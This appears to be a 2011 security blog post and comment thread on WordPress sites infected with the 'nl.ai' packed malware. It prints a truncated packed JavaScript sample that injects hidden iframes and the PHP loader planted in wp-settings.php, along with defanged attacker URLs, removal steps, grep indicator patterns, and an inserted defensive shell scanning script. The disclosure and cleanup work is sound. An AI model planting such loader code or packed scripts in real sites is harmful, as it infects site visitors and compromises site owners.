nl.ai p,a,c,k,e,d Malware

    Malicious hackers are continuing to find new ways to infect benign websites. A recent spate of attacks on WordPress powered sites proves this more strongly than ever.

    One popular method for infecting WordPress powered websites is to inject code into the file “wp-settings.php”. Because that file is loaded on every request, the injected code is then served with every subsequent page request on the compromised website.

    The malware
    The malware shown below usually appears at the top of the page's HTML source, in the head section (the injected loader hooks wp_head). Please check your source code.

    Malware sample:

    <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k||e(c)}k=[function(e){return d[e]}];e=function(){
    ...snipped..
    t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie |toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|ph
    </script>
    

    Steps to remove the malware

    1. Access your hosting account over SSH or SFTP
    2. Remove the malware inserted into the file “wp_inc/upd.php” located in your “/tmp” folder or in your WordPress installation directory. NOTE: Some of our readers have reported that the malware can also reside in a file called revisions-js.php, so please search in this file too. (Thanks to our readers!)
    3. Remove the following code from the file “wp-settings.php”, usually found in your WordPress installation directory
    function check_wordpress(){
        $t_d = sys_get_temp_dir();
        if(file_exists($t_d . '/wp_inc')){
            readfile($t_d . '/wp_inc');
        }
    }
    add_action('wp_head', 'check_wordpress');
    do_action( 'init' );
    

    What does the malware do?
    The injected PHP code causes your WordPress installation to load the malware located inside a file named “wp_inc/upd.php” (usually in your “/tmp” folder). The malware then builds an iframe element pointing to one of many different websites.

    Malware destination sites:

    hxxp://juyfdjhdjdgh.nl.ai/showthread.php
    hxxp://myftp.org/
    hxxp://coom.in/
    

    How did this happen?
    One of the primary vectors for an attack like this one is stolen user credentials. Do not store your username and passwords in FileZilla or similar FTP clients.

    Additionally, make sure your WordPress install is up to date and that all third-party plugins, like TimThumb, are updated too.

    How do I protect my site?
    Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

    StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

    Till next time…

    • I’ve been hit with this one, apparently on several of my sites, so FTP access is suspected.

      Did find the suspect code in my wp-settings.php file.

      Unable to locate anywhere on the server: wp_inc/upd.php file in your /tmp folder or in your WordPress install

      Is this file always present?

      Thanks so much!

      Posted by Bill Alpert on November 7th

    • Yes, in the samples we have seen, these files are present. You can try to search for “Base64” in the files on your hosting account to help you locate the malware files. Try to use grep/Wingrep to search for this pattern.

      Posted by anirban on November 7th

    • […] Seen on this article: http://www.stopthehacker.com/2011/11/07/nl-ai-packed-malware/ […]

      Posted by Wordpress Malware ou comment se faire hacker son site | L'Actu chez MozArtsduWeb on November 8th

    • I found the function in wp-settings but can’t locate the “eval…”

      Posted by crovinz on November 8th

    • That’s OK; just try to clean your wp-settings and locate wp_inc or other files that might contain Base64_ in them, using grep/Wingrep. Remove the malware code with the p,a,c,k,e,d in it anyway.

      Posted by anirban on November 8th

    • I’ve been hit by this one across 4 of my sites; in fact the only site that is clear used Disqus for comments. I also didn’t find the wp_inc/upd.php file. The malware was in revisions-js.php and in cforms.js (from the Cforms plugin).
      The check wordpress function was on my unaffected site, so should I be removing this bit of code or is it actually part of WordPress?

      Posted by Mark T on November 9th

    • If your check wordpress function seems to be pulling in revisions-js.php or some other file then you have to clean it up.

      Posted by anirban on November 9th

    • Also try to search for eval(base64_decode, shell_exec, passthru; you might find hidden scripts inside your install.

      Posted by anirban on November 9th
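    The removal steps in the post and anirban's grep suggestions in the comments (search for Base64, eval(base64_decode, shell_exec, passthru) amount to an indicator sweep over the WordPress tree. The shell script below is an added example, not code from the original post or from StopTheHacker, that performs that sweep and only reports hits so each one can be reviewed by hand; the constructed sample tree, its file contents and the NLAI_PATTERNS regex are assumptions made for the example.

```shell
#!/bin/sh
# Added example, not code from the original post or from StopTheHacker:
# an indicator scan for the nl.ai "p,a,c,k,e,d" infection. It only reports
# where indicators occur; removal stays the manual step described in the post.

# Indicators taken from the post and the comment thread (regex is an assumption):
#   - the packed eval wrapper that opens the injected <script>
#   - the check_wordpress() / sys_get_temp_dir() loader in wp-settings.php
#   - the generic PHP patterns anirban recommends grepping for
NLAI_PATTERNS='eval\(function\(p,a,c,k,e,d\)|function check_wordpress|sys_get_temp_dir|base64_decode|shell_exec|passthru'

# Print every .php/.js/.html file under $1 that contains an indicator.
scan_wp_tree() {
    find "$1" -type f \( -name '*.php' -o -name '*.js' -o -name '*.html' \) \
        -exec grep -lE "$NLAI_PATTERNS" {} + 2>/dev/null | sort
}

# Print line number and matched indicator for one file, for triage: legitimate
# plugins also ship Dean Edwards-packed JavaScript, so a hit is not proof.
explain_hit() {
    grep -noE "$NLAI_PATTERNS" "$1" | sort -u
}

# The loader reads a file named wp_inc from the PHP temp directory; print its
# path if it exists. Pass the temp directory as $1 (defaults to /tmp).
check_tmp_loader() {
    if [ -e "${1:-/tmp}/wp_inc" ]; then
        echo "${1:-/tmp}/wp_inc"
    fi
    return 0
}

# Constructed sample tree so the scan can be exercised offline. The files hold
# only the indicator strings, not a working payload.
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/wp-admin/js" "$root/wp-content/plugins/clean"
    # the loader the post tells you to remove from wp-settings.php
    cat > "$root/wp-settings.php" <<'EOF'
<?php
function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . '/wp_inc')){
readfile($t_d . '/wp_inc');
}
}
add_action('wp_head', 'check_wordpress');
EOF
    # the packed-script opener, in the path several commenters reported
    printf '<script>eval(function(p,a,c,k,e,d){})</script>\n' \
        > "$root/wp-admin/js/revisions-js.php"
    # a base64_decode call of the kind Eric found in index.php files
    printf '<?php eval(base64_decode("Y29uc3RydWN0ZWQ="));?>\n' > "$root/index.php"
    # a clean plugin script that must not be reported
    printf 'document.title = "clean";\n' > "$root/wp-content/plugins/clean/app.js"
    echo "$root"
}

# Demo run on the constructed tree.
demo_root=$(make_sample_tree)
scan_wp_tree "$demo_root" | while read -r f; do
    echo "== $f"
    explain_hit "$f"
done
check_tmp_loader "$demo_root"   # nothing planted there, so prints nothing
rm -rf "$demo_root"
```

    On a real install, run scan_wp_tree against the WordPress directory and check_tmp_loader against whatever sys_get_temp_dir() returns for your PHP. Treat the list as a triage queue, not a delete list: as John notes later in the thread, legitimate plugins also use the packer, so look at each hit with explain_hit before removing anything.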

    • Hi, Thanks for your guide on this. I too have been a victim and suspect it was through storing my FTP details in FileZilla. Also, as with Mark T, I didn’t find wp_inc/upd.php files but it was in the revisions-js.php. Maybe worth adding this to your removal guide.

      Passwords all changed and deleted the account settings from FileZilla, hopefully I’m all safe again! Thank you very much for this guide or I would have been stumped!

      Cheers! John

      Posted by John on November 11th

    • […] WordPress and FileZilla users beware! There’s a new malware doing the rounds that injects code into your WP files. Not the easiest to remove or detect; however, there is an excellent guide here on how to do so: http://www.stopthehacker.com/2011/11/07/nl-ai-packed-malware/. […]

      Posted by John's Stuff | nl.ai p,a,c,k,e,d Malware on November 11th

    • I followed the instructions but strangely my sidebar disappeared. Does anyone know how to get that back?

      Posted by JT on November 24th

    • That’s right, the file is here for many folks: wp-admin/js/revisions-js.php

      Posted by L on November 25th

    • I was unable to find the code in either of those places. I have also heard that it can be in the wp-config.php but did not find it there as well.

      Do you have any other suggestions?

      Posted by Mike on November 25th

    • Use grep/wingrep to search in the template files. Some users are reporting templates as harboring this malware.

      Posted by anirban on November 30th

    • Not always, but with a high degree of confidence. Some users have reported not being able to find it. It could be that your hosting company tried to do a clean up without letting you know specifically.

      Posted by anirban on November 30th

    • Great post and thanks a million for the info. I have been working for a week trying to fix this problem.

      I finally found the base64_decode portion in the Index.php files, but I haven’t been able to find the other portion.

      I am worried that without removing the other portion, the code will just come back.

      I can’t find the wp_inc/upd.php file and the revisions is clear. Has anyone else found another location for the second portion?

      Thanks for any help, this has been one nasty hack that has been a pain in my a** for a week.

      Posted by Eric on December 9th

    • @Eric
      I downloaded my complete website to a folder on my PC and then string-searched the files (with a multiple-file string finder program) for the “p,a,c” string. Found 4 scripts that I was able to delete from my server.
      Do note however, that some of the ‘good’ WP plugins also use Dean Edwards’ packing function, so remember to only delete the ‘bad ones’.

      Posted by John on December 13th

    • I got hit with this across about 3 dozen sites, some without WP. It added the script p,a,c,k…etc clearly to index.HTML files, and also added a weird line of backwards code following the opening <?php tag.
      Spent 3 hours yesterday cleaning all that out and today it's all back!

      So I believe something is attached somewhere to something and getting in thru my FTP client
      So cleaning that problem from my machine seems paramount

      Ran McAfee, Spybot, working on… Will run AVG next
      Any idea where to look specifically?

      And PS thanks for this info

      Thanks

      Posted by Kerchmcc on January 2nd

    • Unfortunately, the variety of password sniffing trojans is pretty large so it is hard to provide an educated answer without knowing the details of the system that was compromised. Trojans can range from simple exe drops placed in system32 folders (on PCs) to sophisticated rootkits and RATs. I would definitely suggest moving away from FTP altogether and trying SFTP/SCP/SSH as a better way to upload your files to your hosting account. Also, please avoid storing any FTP passwords on your local machine, especially inside local FTP clients (FileZilla etc.)

      Posted by anirban on January 5th